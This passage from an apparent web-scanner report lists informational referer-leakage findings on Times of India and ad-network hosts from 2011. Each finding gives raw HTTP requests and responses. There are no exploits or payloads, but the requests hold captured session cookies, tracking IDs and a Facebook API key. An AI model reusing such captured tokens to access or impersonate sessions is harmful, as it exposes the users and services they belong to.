21.91. http://tag.admeld.com/nai-status  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /nai-status

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /nai-status?nocache=2.916962E-02 HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/opt_out.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: meld_sess=14c82149-9fc3-4277-af4b-df6e89b3fc47; D41U=3qBdjM8Fc6wmKGyDniBhVEEJ9ADx4miPR-XDn6vDrZGUndukkKo3FXw

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="PSAo PSDo OUR SAM OTR BUS DSP ALL COR"
Location: http://www.networkadvertising.org/verify/cookie_exists.gif
Content-Length: 242
Content-Type: text/html; charset=iso-8859-1
Date: Sun, 04 Sep 2011 10:59:01 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.networkadvertising.org/verify/cookie_exists.gif">here</a>
...[SNIP]...

21.92. http://tag.admeld.com/nai-status  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /nai-status

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /nai-status?nocache=0.663569 HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/opt_out.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: admeld_opt_out=true

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="PSAo PSDo OUR SAM OTR BUS DSP ALL COR"
Location: http://www.networkadvertising.org/verify/cookie_optout.gif
Content-Length: 242
Content-Type: text/html; charset=iso-8859-1
Date: Sun, 04 Sep 2011 11:38:01 GMT
Connection: close
Set-Cookie: D41U=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.tag.admeld.com

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.networkadvertising.org/verify/cookie_optout.gif">here</a>
...[SNIP]...

21.93. http://tap2-cdn.rubiconproject.com/partner/scripts/rubicon/emily.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tap2-cdn.rubiconproject.com
Path:   /partner/scripts/rubicon/emily.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /partner/scripts/rubicon/emily.html?rtb_ext=1&pc=4642/5271 HTTP/1.1
Host: tap2-cdn.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1519539382@Right2?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; csi2=3214995.js^2^1315096957^1315097051; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1185=2925993182975414771; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%264210%3D1; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; nus_2046=0.00; ses2=5032^2&9346^1; ruid=154e62c97432177b6a4bcd01^2^1315103145^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; rdk=4642/5271; rdk15=0; ses15=5032^2&9346^1&5271^1; csi15=3215715.js^1^1315103145^1315103145&3214998.js^1^1315097284^1315097284&3203911.js^1^1315097079^1315097079

Response

HTTP/1.1 200 OK
Server: TRP Apache-Coyote/1.1
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Last-Modified: Sun, 04 Sep 2011 02:18:56 GMT
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=600
Expires: Sun, 04 Sep 2011 02:49:07 GMT
Date: Sun, 04 Sep 2011 02:39:07 GMT
Content-Length: 9191
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<!-- Copyright the Rubicon Project 2010 -->


<html>
<head>
<title></title>
</head>
<
...[SNIP]...
</script>
<img src="http://pixel.quantserve.com/pixel/p-e4m3Yko6bFYVc.gif" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/>


</body>
...[SNIP]...

21.94. http://timesofindia.indiatimes.com/newtoolbar/9855193.cms  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://timesofindia.indiatimes.com
Path:   /newtoolbar/9855193.cms

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /newtoolbar/9855193.cms?args=0 HTTP/1.1
Host: timesofindia.indiatimes.com
Proxy-Connection: keep-alive
Referer: http://timesofindia.indiatimes.com/city/mumbai/My-friend-Ganesha/articleshow/9855193.cms
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sosh=true; RMID=32177b6a4e62e1a0; _chartbeat2=8l1yir8xsllibs89; RMFD=011R02OxO206Bs|O108EZ|O108i0|O108ih; __utma=1.1749513380.1315103166.1315103166.1315103166.1; __utmb=1.4.10.1315103166; __utmc=1; __utmz=1.1315103166.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP01 (build: SVNTag=JBPAPP_4_3_0_GA_CP01 date=200804211746)/Tomcat-5.5
CacheControl: public
Last-Modified: Thu, 01 Jan 1970 00:00:00 GMT
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Content-Length: 7725
Expires: Sun, 04 Sep 2011 06:11:12 GMT
Date: Sun, 04 Sep 2011 03:02:24 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd" ><html xmlns:g="http://base.google.com/ns/1.0" xmlns:fb="http://www.facebook.com/2008/fbml"><head><META http-e
...[SNIP]...
</style><script src="https://apis.google.com/js/plusone.js" type="text/javascript"></script>
...[SNIP]...
<div onclick="loyalitypoints();facetrack();parent.logaction('715');" style="float:left;padding-top:6px;padding-right:14px;"><script type="text/javascript" src="http://static.ak.fbcdn.net/connect.php/js/FB.Share"></script>
...[SNIP]...
</div><a type="box_count" name="fb_share" href="http://www.facebook.com/sharer.php" share_url="http://timesofindia.indiatimes.com/city/mumbai/My-friend-Ganesha/articleshow/9855193.cms">Share</a></div><div onclick="loyalitypoints();tweetttrack();parent.logaction('716');" style="float:left;padding-right:15px;padding-top:7px;"><script src="http://platform.twitter.com/widgets.js" type="text/javascript"></script><a data-count="vertical" class="twitter-share-button" href="http://twitter.com/share" data-counturl="http://timesofindia.indiatimes.com/city/mumbai/My-friend-Ganesha/articleshow/9855193.cms" data-url="http://timesofindia.indiatimes.com/city/mumbai/My-friend-Ganesha/articleshow/9855193.cms">Tweet</a>
...[SNIP]...

21.95. http://timesofindia.indiatimes.com/toitopics_callbybing.cms  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://timesofindia.indiatimes.com
Path:   /toitopics_callbybing.cms

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /toitopics_callbybing.cms?type=1&query=Xss&seotopic=Xss&topictitle=Xss HTTP/1.1
Host: timesofindia.indiatimes.com
Proxy-Connection: keep-alive
Referer: http://timesofindia.indiatimes.com/topic/Xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sosh=true; RMID=32177b6a4e62e1a0; RMFD=011R02OxO206Bs|O108EZ|O108FG|O108i0|O108ih; _chartbeat2=8l1yir8xsllibs89; _iibeat_session=02f2ca4f-6c90-4fc2-993c-84fedfef7948; __utma=1.1749513380.1315103166.1315103166.1315103166.1; __utmb=1.5.10.1315103166; __utmc=1; __utmz=1.1315103166.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); topic_visit1=Xss

Response

HTTP/1.1 200 OK
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP01 (build: SVNTag=JBPAPP_4_3_0_GA_CP01 date=200804211746)/Tomcat-5.5
CacheControl: public
Last-Modified: Sun, 04 Sep 2011 02:18:52 GMT
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Content-Length: 2702
Expires: Sun, 04 Sep 2011 06:18:45 GMT
Date: Sun, 04 Sep 2011 02:33:56 GMT
Connection: close

<div xmlns:aa="http://schemas.microsoft.com/LiveSearch/2008/04/XML/element" xmlns:mms="http://schemas.microsoft.com/LiveSearch/2008/04/XML/multimedia"><a rel="nofollow" target="_blank" href="http://www.flickr.com/photos/shiroubangrevival/2333454102/"><img height="67" width="100" border="0" src="http://ts1.mm.bing.net/images/thumbnail.aspx?q=1164749182676&id=a072085fcaf4d63ac215172b8de78a69" alt="......120......... by XSS | Flickr - Photo Sharing!" title="......120......... by XSS | Flickr - Photo Sharing!"></a></div><div><a rel="nofollow" target="_blank" href="http://www.cloudscan.me/2011_01_01_archive.html"><img height="67" width="100" border="0" src="http://ts4.mm.bing.net/images/thumbnail.aspx?q=1222360104979&id=fd0f6811832a8165b3887a997c281500" alt="xss, constantcontact.com, CAPEC-86, Cross Site Scripting, CWE-79" title="xss, constantcontact.com, CAPEC-86, Cross Site Scripting, CWE-79"></a></div><div><a rel="nofollow" target="_blank" href="http://www.warezforest.com/hackers-corner/22233-another-tutorial-xss.html"><img height="67" width="100" border="0" src="http://ts1.mm.bing.net/images/thumbnail.aspx?q=1165516476624&id=d106bd8b15caa01dea5a49eed4c0869a" alt="Another tutorial on XSS. - Free Full Downloads - WarezForest.com" title="Another tutorial on XSS. - Free Full Downloads - WarezForest.com"></a></div><div><a rel="nofollow" target="_blank" href="http://www.cloudscan.me/2011/08/adotascom-xss-dork-ghdb-cross-site.html"><img height="67" width="100" border="0" src="http://ts3.mm.bing.net/images/thumbnail.aspx?q=1211691764098&id=0b6c776bd89873afce7caf3de4db1f8e" alt="HTTPi, SQLi, XSS.CX: adotas.com, XSS, DORK, GHDB, Cross Site Scripting ..." title="HTTPi, SQLi, XSS.CX: adotas.com, XSS, DORK, GHDB, Cross Site Scripting ..."></a></div><div><a rel="nofollow" target="_blank" href="http://www.flickr.com/photos/74802212@N00/9099559/"><img height="67" width="100" border="0" src="http://ts4.mm.bing.net/images/thumbnail.aspx?q=1167797593703&id=7993fc562f64deda25818d514fe9fff6" alt="XSS-11 launch | Flickr - Photo Sharing!" title="XSS-11 launch | Flickr - Photo Sharing!"></a></div><div><a rel="nofollow" target="_blank" href="http://connect.in.com/xss-dirt-bike/images-dirt-bike-gnral-125cm3--1-247063585543.html"><img height="67" width="100" border="0" src="http://ts3.mm.bing.net/images/thumbnail.aspx?q=1236127649550&id=9daea3bf037bb96ae6b2d7b44302f40a" alt="Xss Dirt Bike Images: Xss Dirt Bike Images: Xss Dirt Bike Images: Xss ..." title="Xss Dirt Bike Images: Xss Dirt Bike Images: Xss Dirt Bike Images: Xss ..."></a>
...[SNIP]...

21.96. http://timesofindia.indiatimes.com/toitopics_callbybing.cms  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://timesofindia.indiatimes.com
Path:   /toitopics_callbybing.cms

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /toitopics_callbybing.cms?type=2&query=Xss&seotopic=Xss&topictitle=Xss HTTP/1.1
Host: timesofindia.indiatimes.com
Proxy-Connection: keep-alive
Referer: http://timesofindia.indiatimes.com/topic/Xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sosh=true; RMID=32177b6a4e62e1a0; RMFD=011R02OxO206Bs|O108EZ|O108FG|O108i0|O108ih; _chartbeat2=8l1yir8xsllibs89; _iibeat_session=02f2ca4f-6c90-4fc2-993c-84fedfef7948; __utma=1.1749513380.1315103166.1315103166.1315103166.1; __utmb=1.5.10.1315103166; __utmc=1; __utmz=1.1315103166.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); topic_visit1=Xss

Response

HTTP/1.1 200 OK
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP01 (build: SVNTag=JBPAPP_4_3_0_GA_CP01 date=200804211746)/Tomcat-5.5
CacheControl: public
Last-Modified: Sun, 04 Sep 2011 02:18:40 GMT
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Content-Length: 2045
Expires: Sun, 04 Sep 2011 06:18:40 GMT
Date: Sun, 04 Sep 2011 03:37:23 GMT
Connection: close

<div xmlns:aa="http://schemas.microsoft.com/LiveSearch/2008/04/XML/element" xmlns:mms="http://schemas.microsoft.com/LiveSearch/2008/04/XML/multimedia"><a rel="nofollow" class="rel-img" target="_blank" href="http://www.metacafe.com/watch/498661/xss_injection/"><img width="100" height="67" alt="XSS Injection" title="XSS Injection" src="http://ts2.mm.bing.net/videos/thumbnail.aspx?q=1036615943605&id=1da87e74784bee40721a401fc633bf88&bid=%2bNj3RKuF9305YA&bn=Thumb&url=http%3a%2f%2fwww.metacafe.com%2fwatch%2f498661%2fxss_injection%2f"><span class="video-img">
...[SNIP]...
<br><a href="http://www.metacafe.com/watch/498661/xss_injection/">XSS Injection</a>
...[SNIP]...
<div><a rel="nofollow" class="rel-img" target="_blank" href="http://www.youtube.com/watch?v=cYm0N7OsPuI"><img width="100" height="67" alt="HPI Savage XSS" title="HPI Savage XSS" src="http://ts2.mm.bing.net/videos/thumbnail.aspx?q=1058756952125&id=c8b8d0eefcaa380a414d1fdd98de8331&bid=XxseyUOi1UbYcQ&bn=Thumb&url=http%3a%2f%2fwww.youtube.com%2fwatch%3fv%3dcYm0N7OsPuI"><span class="video-img">
...[SNIP]...
<br><a href="http://www.youtube.com/watch?v=cYm0N7OsPuI">HPI Savage XSS</a>
...[SNIP]...
<div><a rel="nofollow" class="rel-img" target="_blank" href="http://www.youtube.com/watch?v=YQWClhpakCE"><img width="100" height="67" alt="XSS L&uuml;cke neu kombiniert" title="XSS L&uuml;cke neu kombiniert" src="http://ts3.mm.bing.net/videos/thumbnail.aspx?q=1165266650574&id=ef9b706577c9e5b11e490c4a75a76597&bid=UjDUUGsPZkQPOw&bn=Thumb&url=http%3a%2f%2fwww.youtube.com%2fwatch%3fv%3dYQWClhpakCE"><span class="video-img">
...[SNIP]...
<br><a href="http://www.youtube.com/watch?v=YQWClhpakCE">XSS L&uuml;cke neu kombiniert</a>
...[SNIP]...

21.97. http://timesofindia.indiatimes.com/toitopics_googleads.cms  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://timesofindia.indiatimes.com
Path:   /toitopics_googleads.cms

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /toitopics_googleads.cms?type=1 HTTP/1.1
Host: timesofindia.indiatimes.com
Proxy-Connection: keep-alive
Referer: http://timesofindia.indiatimes.com/topic/Xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sosh=true; RMID=32177b6a4e62e1a0; RMFD=011R02OxO206Bs|O108EZ|O108FG|O108i0|O108ih; _chartbeat2=8l1yir8xsllibs89; _iibeat_session=02f2ca4f-6c90-4fc2-993c-84fedfef7948; __utma=1.1749513380.1315103166.1315103166.1315103166.1; __utmb=1.5.10.1315103166; __utmc=1; __utmz=1.1315103166.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP01 (build: SVNTag=JBPAPP_4_3_0_GA_CP01 date=200804211746)/Tomcat-5.5
CacheControl: public
Last-Modified: Thu, 01 Jan 1970 00:00:00 GMT
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Content-Length: 3045
Expires: Sun, 04 Sep 2011 02:33:51 GMT
Date: Sun, 04 Sep 2011 02:33:51 GMT
Connection: close

<html><head><META http-equiv="Content-Type" content="text/html; charset=UTF-8"><style type="text/css">a{text-decoration:none}
a:hover{text-decoration: underline}</style></head><body><script language="
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/show_ads.js" language="JavaScript"></script>
...[SNIP]...

21.98. http://uav.tidaltv.com/3PDPHandler.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://uav.tidaltv.com
Path:   /3PDPHandler.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /3PDPHandler.aspx?a1=&g1=&s=000&z1=&app=3&tpdp=5 HTTP/1.1
Host: uav.tidaltv.com
Proxy-Connection: keep-alive
Referer: http://static.eplayer.performgroup.com/ptvFlash/eplayer2/Eplayer.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adidt=7L0HYBxJliUmL23Ke39K9UrX4HShCIBgEyTYkEAQ7MGIzeaS7B1pRyMpqyqBymVWZV1mFkDM7Z28995777333nvvvfe6O51OJ/ff/z9cZmQBbPbOStrJniGAqsgfP358Hz8ijl+fnJ2d/eKPjmdnszd1Nn1bLC+ajx597xd/9KwsLubtF/msyM5mHz369MH9h6OPXpbZNF/kyxYfHdzfG/GLHz36KL9/f//ezv7D7cn5/vn2/v2d/e2De5OD7b3s4GB3d/Lw/OHew49GH70pFvnrNlus6JXf9+7TrM23du/t3t/dubf36af0yyc79Nz5fe9+9Eu+/0v+nwAAAP//; uavpid=852; tidal_ttid=dd4e867c-c693-47de-91e1-d466af06b7be; tpdpc=id%3d25%3border%3d-1%3bfreq%3d-1%3bignoretime%3d9%2f4%2f2011+12%3a00+AM%26id%3d4%3border%3d-1%3bfreq%3d-1%3bignoretime%3d9%2f4%2f2011+12%3a00+AM

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Date: Sun, 04 Sep 2011 03:24:09 GMT
Location: http://pix04.revsci.net/C09816/a7/0/3/0.302?tgt=http%3A%2F%2Fuav.tidaltv.com%2F3PDPHandler.aspx%3Ftpdp%3D6%26app%3D3%26d%3D%7Bsegs%7D
p3p: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV"
Server: Microsoft-IIS/6.0
Set-Cookie: tpdpc=id%3d25%3border%3d-1%3bfreq%3d-1%3bignoretime%3d9%2f4%2f2011+12%3a00+AM272e0ff6e8c662ffaa4d8b11%26id%3d4%3border%3d-1%3bfreq%3d-1%3bignoretime%3d9%2f4%2f2011+12%3a00+AM%26id%3d5%3border%3d-1%3bfreq%3d0%3bignoretime%3d9%2f4%2f2011+12%3a00+AM; domain=tidaltv.com; expires=Fri, 02-Sep-2016 03:24:09 GMT; path=/
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Length: 377
Connection: keep-alive

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://pix04.revsci.net/C09816/a7/0/3/0.302?tgt=http%3A%2F%2Fuav.tidaltv.com%2F3PDPHandler.aspx%3Ftpdp%3D6%26app%3D3%26d%3D%7Bsegs%7D">here</a>
...[SNIP]...

21.99. http://uav.tidaltv.com/3PDPHandler.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://uav.tidaltv.com
Path:   /3PDPHandler.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /3PDPHandler.aspx?tpdp=7&app=2&pid=852 HTTP/1.1
Host: uav.tidaltv.com
Proxy-Connection: keep-alive
Referer: http://static.eplayer.performgroup.com/ptvFlash/eplayer2/Eplayer.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tidal_ttid=dd4e867c-c693-47de-91e1-d466af06b7be

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Date: Sun, 04 Sep 2011 03:22:05 GMT
Location: http://tags.bluekai.com/site/2688
p3p: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV"
Server: Microsoft-IIS/6.0
Set-Cookie: uavpid=852; domain=tidaltv.com; path=/
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Length: 277
Connection: keep-alive

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://tags.bluekai.com/site/2688">here</a>.</h2>
</body></html>

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Tra
...[SNIP]...

21.100. http://web.adblade.com/impsc.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://web.adblade.com
Path:   /impsc.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /impsc.php?cid=1083-2742610312&output=html HTTP/1.1
Host: web.adblade.com
Proxy-Connection: keep-alive
Referer: http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1519539382@Right2?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __sgs=E9sOpfn38Vyk9ev7mYc4l253DJxNrTy2kDg72IC7%2BsE%3D

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.8
P3P: policyref="http://adblade.com/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR"
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Vendor: Adblade LLC | Adblade| http://www.adblade.com
Set-Cookie: __impt=1315103963.766653954479; expires=Mon, 05-Sep-2011 02:39:23 GMT; path=/
Content-type: text/html
Date: Sun, 04 Sep 2011 02:39:23 GMT
Server: lighttpd/1.4.21
Content-Length: 8255

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="content-type" content="text/html;
...[SNIP]...
<td id="adImage" class="adImage1_167" valign="top" align="left"><a class="adTitle1_167" id="adTitle" href="http://www.smarterlifestyles.com/2010/06/01/the-advantages-of-buying-penny-stocks/?fc_id=30637&fc_app_id=4725" target="_blank"><img src="http://static.cdn.adblade.com/banners/images/100x75/6073_4e5fe26912a67.jpg" border="0" />
...[SNIP]...
<div class="adItem1_167" id="_scroll2_"><a class="adDescription1_167" id="adDescription2_" href="http://www.smarterlifestyles.com/2010/06/01/the-advantages-of-buying-penny-stocks/?fc_id=30637&fc_app_id=4725" target="_blank">Recession or not, penny stocks are the secret to being able to afford anything you want...</a>&nbsp; <a class="adLearnMoreLink1_167" href="http://www.smarterlifestyles.com/2010/06/01/the-advantages-of-buying-penny-stocks/?fc_id=30637&fc_app_id=4725" target="_blank">Learn more</a>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/p?c1=8&c2=6864322&c3=&c4=&c5=&c6=&c10=&c15=&cj=1" />
</noscript>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
<noscript>
<img src="http://pixel.quantserve.com/pixel/p-b8GPCpJxfqYm2.gif" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/>
</noscript>
<!-- End Quantcast tag -->
<script type="text/javascript" src="http://pixel.adsafeprotected.com/jspix?anId=140&pubId=11479&campId=4725"></script>
<noscript><img src="http://pixel.adsafeprotected.com?anId=140&pubId=11479&campId=4725"></noscript>
...[SNIP]...

21.101. http://www.connect.facebook.com/widgets/fan.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.connect.facebook.com
Path:   /widgets/fan.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /widgets/fan.php?api_key=731d4310e657b3903e3002a6432bca32&channel_url=http%3A%2F%2Ftimesofindia.indiatimes.com%2Ftoifanapp.cms%3Ffbc_channel%3D1&id=26781952138&name=&width=300&connections=&stream=0&logobar=1&css= HTTP/1.1
Host: www.connect.facebook.com
Proxy-Connection: keep-alive
Referer: http://timesofindia.indiatimes.com/toifanapp.cms
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.32.176.106
X-Cnection: close
Date: Sun, 04 Sep 2011 02:25:48 GMT
Content-Length: 8406

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Fan</title>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/ya/r/0V1g9eV4kVC.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/ya/r/HR2ezcCYeTR.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yx/r/xxErGdwd-7F.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yE/r/te2emPSgfVn.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yq/r/346Pl_u5ziA.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yn/r/fXOlnGV2onC.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/y4/r/swbbSSZsgUH.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yC/r/vneZ6lOGBMV.js"></script>
...[SNIP]...
